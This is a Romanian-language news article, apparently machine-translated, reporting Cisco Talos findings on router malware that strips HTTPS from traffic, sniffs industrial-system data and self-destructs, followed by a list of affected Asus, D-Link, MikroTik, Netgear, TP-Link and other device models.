Pentru a preveni furtul Informații personale de obicei, se folosește criptarea TLS, pe care programele malware o pot ocoli. Acest lucru se face prin downgrade a conexiunilor HTTPS la trafic HTTP care nu este protejat de nimic. Antetele cererii sunt apoi înlocuite, semnalând că punctul de acces este vulnerabil. Ssler într-un mod special modifică traficul diverselor resurse, inclusiv Google, Facebook, Twitter și Youtube. Cert este că aceste servicii oferă protectie suplimentara... LA Exemplu Google redirecționează traficul HTTP către serverele HTTPS. Dar modulul vă permite să ocoliți această protecție, astfel încât atacatorii să primească trafic necriptat.
De la descoperirea virusului, experții în securitatea informațiilor au studiat posibilitățile acestuia. Acum s-a dovedit că este mai periculos decât se credea. Anterior, de exemplu, experții Cisco au susținut că sarcina principală criminali cibernetici – infecție dispozitive de rețeaîn birourile companiei și în casele victimelor. Poate pentru a forma o rețea bot. Dar acum s-a dovedit că utilizatorii, sau mai degrabă datele lor, sunt scopul principal.
„Inițial, când am descoperit virusul, am crezut că a fost creat pentru a implementa diverse tipuri de atacuri de rețea... Dar s-a dovedit că aceasta nu este deloc sarcina și posibilitatea principală a malware-ului. A fost creat în principal pentru a fura datele utilizatorilor și a modifica traficul. De exemplu, un virus poate modifica traficul în așa fel încât un utilizator-client-bancă va vedea suma anterioară în contul său. Dar, de fapt, nu există bani acolo de mult timp, ”- spune raportul experților în securitate cibernetică.
Interesant este că majoritatea dispozitivelor infectate sunt localizate în/în Ucraina. Măsurile de protecție precum HTTP Strict Transport Security nu sunt obișnuite aici, așa că datele utilizatorilor sunt în pericol. Dar există probleme și în alte țări - de exemplu, în SUA și Europa de Vest, multe dispozitive învechite din punct de vedere moral nu acceptă lucrul cu HTTPS, continuând să folosească HTTP.
Anterior a fost raportat că cele mai vulnerabile modele de routere pentru acest virus sunt dispozitivele fabricate de ASUS, D-Link, Huawei, Ubiquiti, UPVEL și ZTE. De fapt, gama de dispozitive vulnerabile la virus este mult mai largă. Aceasta include modele de la Linksys, MikroTik, Netgear și TP-Link.
Lista plina dispozitive vulnerabile
Asus:
RT-AC66U (nou)
RT-N10 (nou)
RT-N10E (nou)
RT-N10U (nou)
RT-N56U (nou)
RT-N66U (nou)
D-Link:
DES-1210-08P (nou)
DIR-300 (nou)
DIR-300A (nou)
DSR-250N (nou)
DSR-500N (nou)
DSR-1000 (nou)
DSR-1000N (nou)
Huawei:
HG8245 (nou)
Linksys:
E1200
E2500
E3000 (nou)
E3200 (nou)
E4200 (nou)
RV082 (nou)
WRVS4400N
Mikrotik:
CCR1009 (nou)
CCR1016
CCR1036
CCR1072
CRS109 (nou)
CRS112 (nou)
CRS125 (nou)
RB411 (nou)
RB450 (nou)
RB750 (nou)
RB911 (nou)
RB921 (nou)
RB941 (nou)
RB951 (nou)
RB952 (nou)
RB960 (nou)
RB962 (nou)
RB1100 (nou)
RB1200 (nou)
RB2011 (nou)
RB3011 (nou)
RB Groove (nou)
RB Omnitik (nou)
STX5 (nou)
Netgear:
DG834 (nou)
DGN1000 (nou)
DGN2200
DGN3500 (nou)
FVS318N (nou)
MBRN3000 (nou)
R6400
R7000
R8000
WNR1000
WNR2000
WNR2200 (nou)
WNR4000 (nou)
WNDR3700 (nou)
WNDR4000 (nou)
WNDR4300 (nou)
WNDR4300-TN (nou)
UTM50 (nou)
QNAP:
TS251
TS439 Pro
Alte NAS QNAP cu QTS
TP-Link:
R600VPN
TL-WR741ND (nou)
TL-WR841N (nou)
Ubiquiti:
NSM2 (nou)
PBE M5 (nou)
Nivel superior:
Modele necunoscute * (nou)
ZTE:
ZXHN H108N (nou)
Și asta nu este tot
Pe lângă tot ce a fost anunțat mai sus, Talos a raportat descoperirea unui modul sniffer. Acesta analizează traficul în căutarea de date de un anumit tip care sunt asociate cu operarea sistemelor industriale. Acest trafic trece prin TP-Link R600, care este determinat de modul. În plus, modulul caută adrese IP dintr-un interval specific, precum și pachete de date care au 150 de octeți sau mai mult.
„Creatorii virusului caută lucruri foarte specifice. Ei nu încearcă să adune cât mai mult posibil. informatii disponibile, deloc. Au nevoie de parole, autentificări, acces la un anumit interval IP și altele asemenea. Încercăm să înțelegem cine ar putea avea nevoie de toate acestea ”, spun cercetătorii.
Dar asta nu este tot, pentru că acum virusul este în curs de actualizare, în funcționalitatea sa a apărut un modul de autodistrugere. Când modulul este activat, virusul este eliminat din dispozitiv fără nicio urmă.
În ciuda faptului că în urmă cu aproximativ o săptămână, FBI-ul a descoperit și a confiscat serverul principal, botnet-ul este încă activ, măsurile luate clar nu a fost suficient.
